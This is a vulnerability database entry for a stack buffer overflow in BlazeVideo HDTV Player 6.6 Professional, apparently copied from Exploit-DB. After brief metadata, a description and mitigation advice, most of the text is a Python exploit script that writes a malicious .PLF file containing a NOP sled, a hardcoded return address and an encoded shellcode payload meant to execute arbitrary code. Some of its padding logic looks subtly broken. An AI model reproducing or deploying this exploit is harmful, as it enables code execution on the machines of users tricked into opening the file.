BlazeVideo HDTV Player 6.6 Professional (Direct Retn)

vendor:

BlazeVideo HDTV Player Professional

by:

Nezim

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BlazeVideo HDTV Player Professional

Affected Version From: 6.6 Professional

Affected Version To: 6.6 Professional

Patch Exists: YES

Related CWE: N/A

CPE: a:blazevideo:blazevideo_hdtv_player_professional:6.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2012

BlazeVideo HDTV Player 6.6 Professional (Direct Retn)

A buffer overflow vulnerability exists in BlazeVideo HDTV Player 6.6 Professional. The vulnerability is caused due to a boundary error when handling a specially crafted .PLF file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a malicious .PLF file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of BlazeVideo HDTV Player 6.6 Professional.

Source

Exploit-DB raw data:

# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Direct Retn)
# Date: 11-25-2012
# Exploit Author: Nezim (@nezimlufni)
# Vendor Homepage: http://www.blazevideo.com/
# Version: BlazeVideo HDTV Player 6.6 Professional
# Tested on: Windows XP SP3
# Reference  : http://www.exploit-db.com/exploits/18693/
# Thanks to : @ardynetral  
# Website : http://is2c-dojo.com

filename="video.PLF"

junk = "http://"+"\x90"*253
junk +="\x33\xBF\x96\x7C"
junk +="\x90" * 32
junk +=("\xdb\xdc\x2b\xc9\xb1\x51\xbb\x01\x5c\x8e\x27\xd9\x74\x24\xf4\x58"
"\x83\xc0\x04\x31\x58\x13\x03\x59\x4f\x6c\xd2\xa5\x05\x9b\x50\xbd"
"\x23\xa4\x94\xc2\xb4\xd0\x07\x18\x11\x6c\x92\x5c\xd2\x0e\x18\xe4"
"\xe5\x01\xa9\x5b\xfe\x56\xf1\x43\xff\x83\x47\x08\xcb\xd8\x59\xe0"
"\x05\x1f\xc0\x50\xe1\x5f\x87\xaf\x2b\x95\x65\xae\x69\xc1\x82\x8b"
"\x39\x32\x43\x9e\x24\xb1\xcc\x44\xa6\x2d\x94\x0f\xa4\xfa\xd2\x50"
"\xa9\xfd\x0f\x6d\xfd\x76\x46\x1d\xd9\x94\x38\x1e\x10\x7e\xde\x2b"
"\x10\xb0\x94\x6b\x9b\x3b\xda\x77\x0e\xb0\x5b\x8f\x0e\xaf\xd5\xc1"
"\xa0\xc3\xba\x22\x6a\x7d\x68\xba\xfb\xb1\xbc\x2a\x8b\xc6\xf2\xf5"
"\x27\xd6\x23\x61\x03\xc5\x38\x4a\xc3\xe9\x17\xf3\x6a\xf0\xfe\x8a"
"\x80\xf3\xfc\xd9\x30\x06\xfe\x31\xac\xdf\x09\x44\x80\xb7\xf6\x70"
"\x88\x64\x5a\x2f\x7c\xc8\x0f\x8c\xd1\x31\x7f\x74\xbe\xdc\xdc\x1e"
"\x6d\x56\x3d\x4b\xf9\xcc\xa4\x03\x3d\x5b\x26\x35\xab\x74\x89\xec"
"\xd3\xa5\x41\xaa\x81\x68\x7b\xe5\x26\xa2\x28\x5c\x26\x9b\xa7\xbb"
"\x91\x9a\x71\x14\xdd\x75\xd1\xce\x75\x2f\x2d\x3e\xe6\xa7\x36\xc7"
"\xcf\x41\xee\xc8\x06\xe4\xef\xe6\xc1\x6d\x74\x60\x66\x11\x19\xe5"
"\x93\xbf\xb1\xac\x72\x8c\xbb\xa9\xef\x48\x35\xd7\xc1\x90\xb6\xbd"
"\xdc\x53\x14\x3f\x62\x78\xf5\x32\x19\xb8\x52\xe7\x75\xd0\xd6\x09"
"\x3a\x37\xe8\x80\x79\xc7\xc0\x31\xd5\x65\xbc\x94\x88\xe3\x3f\x47"
"\x7a\xa1\x6e\x98\xac\x21\x3c\xbf\x48\x7c\x6d\xc0\x85\xea\x6d\xc1"
"\x1d\x14\x41\xb6\x35\x16\xe1\x0c\xdd\x19\x30\xde\xe1\x36\xd5\xa0"
"\xc5\x55\x55\x0f\x09\x4f\x65\x7f")
junk +="\x90" * (261-len(junk))
junk +="\CC" * (1000-len(junk))
exploitf = open(filename,"wb")
exploitf.write(junk)
exploitf.close()
print("Finish")
#Husnul Khatimah